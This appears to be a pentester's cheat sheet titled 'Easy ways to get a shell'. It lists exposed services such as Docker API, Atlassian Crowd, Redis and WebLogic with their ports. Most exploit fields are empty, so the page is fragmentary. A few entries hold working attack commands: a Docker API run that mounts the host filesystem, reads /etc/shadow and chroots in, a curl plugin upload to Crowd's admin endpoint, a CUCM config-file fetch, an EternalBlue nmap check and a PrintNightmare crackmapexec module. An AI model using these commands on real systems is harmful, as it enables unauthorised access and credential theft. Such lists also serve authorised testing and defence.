Low-Hanging Fruit
Easy ways to get a shell
Services
Adobe ColdFusion BlazeDS
Ports: 8080 Exploit:
Apache Flink
Ports: 5000 Exploit:
Apache Hadoop
Ports: 8088 Exploit:
Apache Solr
Ports: 8983 Exploit:
Apache Spark
Ports: 6066 Exploit:
Atlassian Crowd
Ports: 4990 Exploit:
curl -k -H "Content-Type: multipart/mixed" \ --form "[email protected]" http://[HOST]:4990/crowd/admin/uploadplugin.action
Cisco Smart Install
Ports: 4786 Exploit:
Cisco Unified Communications Manager
Ports: 6970 Exploit:
curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt
Dameware
Ports: 6129 Exploit:
Dell iDrac
Ports: 443
Exploit:
Docker API
Ports: 2375 Exploit:
docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
File Access:
cat /mnt/etc/shadow
Remote Code Execution:
chroot /mnt
GlassFish
Ports: 4848 Exploit:
Hashicorp Consul
Ports: 8500 Exploit:
HP Data Protector
Ports: 5555, 5556 Exploit:
HP iLO
Ports: 80, 443
Exploit:
IBM Websphere
Ports: 8880 Exploit:
IPMI
Ports: 623 Exploit:
Java RMI
Ports: 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999 Exploit:
JBoss
Ports: 4444, 4445, 11111 Exploit:
JDWP
Ports: 5005 - 5009, 45000, 45001 Exploit:
JMX
Ports: 8686, 9012, 50500 Exploit:
MS17-010: Eternal Blue
Ports 139, 445
Exploit:
nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip
Portainer
Ports: 9000 Exploit:
PrintNightmare
crackmapexec smb $host_file -u $username -p $password -M spooler
Redis
Ports: 6379 Exploit:
SAP
Ports: 3300 Exploit:
WebLogic
Ports: 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503 Exploit:
Zoho Manageengine Desktop
Ports: 8383 Exploit:
References
Last updated